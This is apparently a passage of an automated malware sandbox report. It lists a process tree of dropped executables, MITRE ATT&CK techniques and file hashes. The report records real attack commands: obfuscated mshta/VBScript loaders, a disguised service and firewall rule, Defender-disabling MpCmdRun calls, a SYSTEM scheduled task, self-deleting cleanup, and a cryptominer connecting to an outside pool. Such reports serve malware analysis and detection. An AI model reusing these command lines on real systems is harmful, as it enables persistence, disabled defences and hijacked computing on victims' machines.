                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                  "C:\Windows\System32\sc.exe" create nnvmwmp binPath= "C:\Windows\SysWOW64\nnvmwmp\yrjfdoc.exe /d\"C:\Users\Admin\AppData\Local\Temp\5C2B.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4116
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "C:\Windows\System32\sc.exe" description nnvmwmp "wifi internet conection"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3480
                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                      "C:\Windows\System32\sc.exe" start nnvmwmp
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4928
                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4972
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5F3A.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5F3A.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5340
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBscrIPt:cLOSE ( cReaTEoBjecT ("wsCrIpT.SHelL" ). RUN ( "CMD.Exe /Q/c COpy /y ""C:\Users\Admin\AppData\Local\Temp\5F3A.exe"" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF """" == """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\5F3A.exe"" ) do taskkill -F -IM ""%~nxw"" " , 0 , tRUe) )
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4000
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q/c COpy /y "C:\Users\Admin\AppData\Local\Temp\5F3A.exe" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF "" == "" for %w In ("C:\Users\Admin\AppData\Local\Temp\5F3A.exe" ) do taskkill -F -IM "%~nxw"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4588
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe
                                                                                                                                                                    ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4504
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBscrIPt:cLOSE ( cReaTEoBjecT ("wsCrIpT.SHelL" ). RUN ( "CMD.Exe /Q/c COpy /y ""C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe"" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF ""-pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO "" == """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe"" ) do taskkill -F -IM ""%~nxw"" " , 0 , tRUe) )
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5452
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q/c COpy /y "C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe" ~MoTp2.exe && sTARt ~mOtp2.eXE -pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO & iF "-pDsK1r9m5sJ4upuBMtf6Oq3U1MCEHO " == "" for %w In ("C:\Users\Admin\AppData\Local\Temp\~MoTp2.exe" ) do taskkill -F -IM "%~nxw"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4156
                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBsCRipt: ClosE ( CreAtEObJeCT ( "wSCRIPt.SHELL" ). rUN ( "cMd /Q /C eCho Z%TImE%ApS5D> m0AI.EFs & echO | set /p = ""MZ"" > BJ20P.c & cOPY /B /y bJ20P.C + J62Nc.UQ + mN5KGOW.2 +m0Ai.EFS 5HV1w9.F9 & DeL J62Nc.UQ mN5KgOW.2 M0Ai.EFS bJ20P.C& staRT regsvr32.exe -u 5hV1W9.F9 /S" , 0, TruE) )
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5388
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /C eCho Z%TImE%ApS5D> m0AI.EFs & echO | set /p = "MZ" > BJ20P.c & cOPY /B /y bJ20P.C + J62Nc.UQ+ mN5KGOW.2 +m0Ai.EFS 5HV1w9.F9 &DeL J62Nc.UQ mN5KgOW.2 M0Ai.EFS bJ20P.C& staRT regsvr32.exe -u 5hV1W9.F9 /S
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5660
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>BJ20P.c"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:2452
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echO "
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:6012
                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                        regsvr32.exe -u 5hV1W9.F9 /S
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:2416
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill -F -IM "5F3A.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:5168
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\60E0.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\60E0.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:4784
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 60E0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\60E0.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5876
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im 60E0.exe /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:68
                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:1300
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6650.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6650.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4552
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\675B.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\675B.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2460
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6A4A.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6A4A.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:304
                                                                                                                                                                                  • C:\Windows\SysWOW64\nnvmwmp\yrjfdoc.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\nnvmwmp\yrjfdoc.exe /d"C:\Users\Admin\AppData\Local\Temp\5C2B.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:2312
                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      PID:5936
                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3024
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C3EF.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C3EF.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      PID:5364
                                                                                                                                                                                      • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4528
                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                          schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:5424
                                                                                                                                                                                        • C:\Windows\System\svchost.exe
                                                                                                                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          PID:6140
                                                                                                                                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3188
                                                                                                                                                                                            • C:\Windows\System\spoolsv.exe
                                                                                                                                                                                              "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1396
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5CC0.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5CC0.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:1524
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A4C2.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A4C2.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:5916
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CD79.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CD79.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:2704
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\CD79.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\CD79.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:676
                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2368
                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1044
                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5024
                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1468
                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4724
                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4944
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5268
                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5912
                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2332

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                              Execution

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                              2
                                                                                                                                                                                                              T1031

                                                                                                                                                                                                              New Service

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1050

                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                              2
                                                                                                                                                                                                              T1060

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                              New Service

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1050

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                              5
                                                                                                                                                                                                              T1112

                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                              2
                                                                                                                                                                                                              T1089

                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1497

                                                                                                                                                                                                              File Permissions Modification

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1222

                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1130

                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                              4
                                                                                                                                                                                                              T1081

                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                              6
                                                                                                                                                                                                              T1012

                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1497

                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                              6
                                                                                                                                                                                                              T1082

                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1120

                                                                                                                                                                                                              Collection

                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                              4
                                                                                                                                                                                                              T1005

                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1102

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1b627b74031c516d2f24984e2325290e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                16b58e66efdeb267f753ea3f0b2f7b89f0d4a268

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                89876c666c6b3615e50460b5dec890bdc89047214f1b317a16f5ef0270bef59c

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                205f73bf4b6cb5f9938b37e0970bc83a20bae22d769ea87b8934565f3faa42d10525e8c7741ca271c160be138041279284892667d41341ddf3e97721764feae8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                35a5ab71990f411955cba00ae4dcc346

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d0bc12e4c7cd1734beac2ae779949679

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                71229cdafa083a15e28b263a203bba360669dfaa

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                106b24f3f1995933dae9cc2ba7907bb6cb19f335d039f964c3a4c861d5f402b5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                fbc97c12766705642da9d438c4014fd5afd24729853c2a7598c681341666e03842e598598678e92d28ebc44f4473771de5ea9f160a096a1121d91f121be57e25

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1267d786142a734fc7789c548d90c91a

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e955ae03a49127b609ebc8c2946c3cc6653088b1

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a090b253ceeb4ebb6cacfebb1ebf455e49fb5a053c4b23654ed755c58b8ba7e0

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                331f3136e8c17c000c962e7d5b03b307e1a69ce733f51b74d82b5af225b30154623e7a40df905e7f603f79b19d90474039c89c103da53c633b1faa8fcc6cb5fa

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                15d8d775253f7cf5c186455691d9badb

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                0b01c53b569ec6931c6f1447228de154086fafc3

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ed669a196d635c0ef9326ef2e7b6c96af3bffdd655ef13a8b7e925b1293d05bc

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                fa8b8d5c595ef89b01d1b3dccd313d7c964095ce5bec7d26616748b230a076917ee81050ce7097af4efb60464a227f3c49bf47de5b9c056304a30c7c111fa199

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                c53571f765bf89defb31c6dc9a75a3b2

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                9bef318ed977df5f72f4f6941c937a03e49aa32f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                f113fb7f33f705553816df89dad094dcd122ec2e4268df721763c3c542c1eb3c

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                472fb0bcf614481abaa8c67ae56b630d271187bfac5b80a1e0a0833a6679f83d1a09423877bdc17374e72feb336103f30e0e26c724970365edab28e4ac18ccd1

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\libcurl.dll
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\libcurlpp.dll
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\libstdc++-6.dll
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\libwinpthread-1.dll
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\setup_install.exe
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\setup_install.exe
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.exe
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.exe
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.txt
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_2.exe
                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                SHA512

